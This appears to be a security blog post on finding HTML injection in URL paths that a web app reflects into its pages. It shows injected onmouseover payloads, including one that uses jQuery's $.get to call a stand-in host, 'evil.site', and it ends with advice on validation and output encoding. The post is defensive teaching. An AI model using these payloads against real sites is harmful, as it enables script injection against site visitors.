On a Path to HTML Injection

URLs guide us through the trails among web apps. We follow their components — schemes, hosts, ports, querystrings — like breadcrumbs. They lead to the bright meadows of content. They lead to the dark thickets of forgotten pages. Our browsers must recognize when those crumbs take us to infestations of malware and phishing.Trail Ends

And developers must recognize how those crumbs lure dangerous beasts to their sites.

The apparently obvious components of URLs (the aforementioned origins, paths, and parameters) entail obvious methods of testing. Phishers squat on FQDN typos and IDN homoglyphs. Other attackers guess alternate paths, looking for /admin directories and backup files. Others deliver SQL injection and HTML injection (a.k.a. cross-site scripting) payloads into querystring parameters.

But URLs are not always what they seem. Forward slashes don’t always denote directories. Web apps might decompose a path into parameters passed into backend servers. Hence, it’s important to pay attention to how apps handle links.

A common behavior for web apps is to reflect URLs within pages. In the following example, we’ve requested a link, https://web.site/en/dir/o/80/loch, which shows up in the HTML response like this:

<link rel="canonical" href="https://web.site/en/dir/o/80/loch" />

There’s no querystring parameter to test, but there’s still plenty of items to manipulate. Imagine a mod_rewrite rule that turns ostensible path components into querystring name/value pairs. A link like https://web.site/en/dir/o/80/loch might become https://web.site/en/dir?o=80&foo=loch within the site’s nether realms.

We can also dump HTML injection payloads directly into the path. The URL shows up in a quoted string, so the first step could be trying to break out of that enclosure:


The app neglects to filter the payload although it does transform the quotation marks with HTML encoding. There’s no escape from this particular path of injection:

<link rel="canonical" href="https://web.site/en/dir/o/80/loch&quot;onmouseover=alert(9);&quot;" />

However, if you’ve been reading here often, then you’ll know by now that we should keep looking. If we search further down the page a familiar vuln scenario greets us. (As an aside, note the app’s usage of two-letter language codes like en and de; sometimes that’s a successful attack vector.) As always, partial security is complete insecurity.

<div class="list" onclick="Culture.save(event);" >
<a href="/de/dir/o/80/loch"onmouseover=alert(9);"?kosid=80&type=0&step=1">Deutsch</a>

We probe the injection vector and discover that the app redirects to an error page if characters like < or > appear in the URL:

Please tell us (us@web.site) how and on which page this error occurred.

The error also triggers on invalid UTF-8 sequences and NULL (%00) characters. So, there’s evidence of some filtering. That basic filter prevents us from dropping in a <script> tag to load external resources. It also foils character encoding tricks to confuse and bypass the filters.

Popular HTML injection examples have relied on <script> tags for years. Don’t let that limit your creativity. Remember that the rise of sophisticated web apps has meant that complex JavaScript libraries like jQuery have become pervasive. Hence, we can leverage JavaScript that’s already present to pull off attacks like this:


<div class="list" onclick="Culture.save(event);" >
<a href="/de/dir/o/80/loch"onmouseover=$.get("//evil.site/");"?kosid=80&type=0&step=1">Deutsch</a>

We’re still relying on the mouseover event and therefore need the victim to interact with the web page to trigger the payload’s activity. The payload hasn’t been injected into a form field, so the HTML5 autofocus/onfocus trick won’t work.

We could further obfuscate the payload in case some other kind of filter is present:


Parameter validation and context-specific output encoding are two primary countermeasures for HTML injection attacks. The techniques complement each other; effective validation prevents malicious payloads from entering an app, correct encoding prevents a payload from changing a page’s DOM. With luck, an error in one will be compensated by the other. But it’s a bad idea to rely on luck, especially when there are so many potential errors to make.

Two weaknesses enable attackers to shortcut what should be secure paths through a web app:

  • Validation routines must be applied to all incoming data, not just parameters. Form fields and querystring parameters may be the most notorious attack vectors, but they’re not the only ones. Request headers and URL components are just as easy to manipulate.
  • Blacklisting often fails because developers have a poor understanding for or a limited imagination of crafting exploits. Even worse are filters built solely from observing automated tools, which leads to naive defenses like blocking alert or <script>.

Output encoding must be applied consistently. It’s one thing to have designed a strong function for inserting text into a web page; it’s another to make sure it’s implemented throughout the app. Attackers are going to follow these breadcrumbs through your app. Be careful, lest they eat a few along the way.